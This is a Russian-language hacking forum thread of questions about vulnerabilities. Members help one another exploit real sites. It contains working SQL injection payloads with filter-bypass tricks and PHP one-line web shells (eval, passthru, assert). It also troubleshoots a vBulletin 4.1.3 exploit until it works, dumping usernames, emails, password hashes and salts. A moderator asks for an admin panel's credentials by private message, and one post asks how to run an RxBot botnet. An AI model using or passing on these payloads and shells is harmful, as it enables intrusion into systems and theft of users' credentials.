Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    stan0009, load_file() читает файл, через него залить нельзя.
    подскажите, через какую функцию в mysql сделать так, чтобы php-код из нее исполнялся?
     
    _________________________
  2. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    53
    Likes Received:
    5
    Reputations:
    -4
    Подскажите как юзать данную скулю. Там blind?
     
  3. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    Никак, то что Ereee привел вообще не inj, там же написано в заголовке. Зато ниже постом ниже уже описание sql inj через User Agent.
     
  4. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    53
    Likes Received:
    5
    Reputations:
    -4
    А как тогда использовать ту скулю с user agent?
    ----------
    Есть ли какой-нибудь инструмент для удобства использования такой скули?
     
  5. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Что дальше будет?
     
    #19725 Ereee, 12 Mar 2012
    Last edited: 12 Mar 2012
  6. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    53
    Likes Received:
    5
    Reputations:
    -4
    Спасибо.
    Ereee я ни разу не работал с подменой кук, хедеров и т.п.
     
  7. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    блин я чувствую что уже рядом моя цель.
    в моем phpmyadmine версии 2.9.1.1 таких "команд" типа options, view text, full не существует как бы. Есть ключ или как говорит phpmyadmin индекс с названием full text.
    Сам в ключах не разбираюсь, и как это использовать так же не знаю. Мне нужен такой человек, который прошел через такую админку. Чтобы опыт был, если по другому.
     
  8. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605
    скинь в ПМ адрес этой админки пароль логин и если есть асю тоже напиши
     
    _________________________
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    там где [ ], что должно быть, чтобы выполнилось верно?
    фильтрация на + /**/ %0a и остальное
     
    _________________________
  10. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Попробуй:
    Code:
    index.php?id=(1)union(select(1),2,3,4,5,6)
     
    1 person likes this.
  11. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    Либо
    (1)and(1)=(1)union(select(1),2,3,4,5,6)+--+
     
  12. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Я вас наверно уже задолбал)
    ну ладно)
    при открытии мини-шелла с кодом:
    Code:
    <?php eval($_GET[cmd]); ?>
    получается вот такая петрушка при ?cmd=phpinfo() и так далее:
    либо unexpected $end
    либо T_STRING
    system не катит, так как disallow.
    в чем подвох?
     
  13. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    332
    Likes Received:
    177
    Reputations:
    76

    ?cmd=phpinfo();
     
  14. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    если бы. так при любых командах
    я догадываюсь что дело в сервере
     
  15. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    332
    Likes Received:
    177
    Reputations:
    76
    Вот такое нагуглил, может, что-нибудь подойдет в твоем случае :)

    PHP:
    QНашел sql-инъекциюно злые админы поставили на фильтрацию на пробелСуществуют ли аналоги пробела в sql-запросах?

    AЕще как существуютВот наиболее часто применяемые способы для замены пробела:

        + 
    или %2B;
        
    табуляция " " или %09;
        
    возврат каретки " " или %0D;
        
    перевод строки %0A;
        
    коментарий /**/
        
    скобкиselect(1)from(users)where(id=1)


    PHP:
    <? passthru($_GET[cmd]); ?>
    <?assert($_GET[cmd]); ?>
    Поэкспериментируй с этими.
     
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    как тут в конце заменить на скобки?
     
    _________________________
  17. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    20
    Reputations:
    2
    Ребята!!) Подскажите как управлять RxBot в мирке (Botnet)
     
  18. DronS

    DronS New Member

    Joined:
    14 Jul 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Нашел эксплоит на exploit-db.com для Vbulletin 4.1.3
    Code:
    &messagegroupid[0]=3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1
    а DB мне в ответ вот так:
    Code:
    Invalid SQL:
    
    					SELECT socialgroup.name
    					FROM socialgroup AS socialgroup
    					WHERE socialgroup.groupid IN (3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1);
    
    MySQL Error   : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3
    Вопрос: как победить эту долбаную скобку в конце?
     
  19. gl0w

    gl0w Member

    Joined:
    31 Dec 2011
    Messages:
    59
    Likes Received:
    21
    Reputations:
    5
    Добавить вот здесь:

    &messagegroupid[0]=3) UNION (SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1
     
    #19739 gl0w, 13 Mar 2012
    Last edited: 13 Mar 2012
  20. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    тогда нужно сделать так
    &messagegroupid[0]=3) UNION (SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt)) FROM user WHERE userid=1
     
Loading...
Thread Status:
Not open for further replies.